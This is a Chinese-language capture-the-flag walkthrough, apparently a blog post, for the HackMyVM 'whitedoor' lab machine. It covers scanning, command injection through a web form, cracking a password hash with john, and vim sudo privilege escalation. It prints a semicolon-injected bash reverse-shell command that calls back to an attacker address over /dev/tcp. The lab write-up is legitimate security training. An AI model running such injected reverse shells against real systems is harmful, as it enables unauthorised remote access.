Hackmyvm whitedoor

简介

难度:简单
靶机地址:

环境

kali:192.168.194.9
靶机:192.168.194.24

扫描

nmap -sT -sV -A -T4 192.168.194.24 -p- -Pn
在这里插入图片描述
三个服务,ftp匿名登录、ssh连接以及web服务
在这里插入图片描述
ftp里面只有一个没用的README文件
在这里插入图片描述
访问web服务,看到输入框,随便输入点内容,返回提示只有ls命令能够使用
在这里插入图片描述
尝试用分号进行注入,成功执行命令!
ls;bash -c "bash -i >/dev/tcp/192.168.194.9/9090 <&1"
在这里插入图片描述
反弹shell回来。
在这里插入图片描述
在whiteshell用户的桌面找到密码文件,base64解码获得密码
在这里插入图片描述
whiteshell用户能够进入Gonzalo用户的home文件夹,找到密码哈希文件
john hash --wordlist=/usr/share/wordlists/rockyou.txt --rules=single
在这里插入图片描述
本地john进行破解,获得密码
在这里插入图片描述
登录Gonzalo用户,拿下flag和权限

提权

sudo中一个vim能够简单利用
在这里插入图片描述
直接一发vim拿下!
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值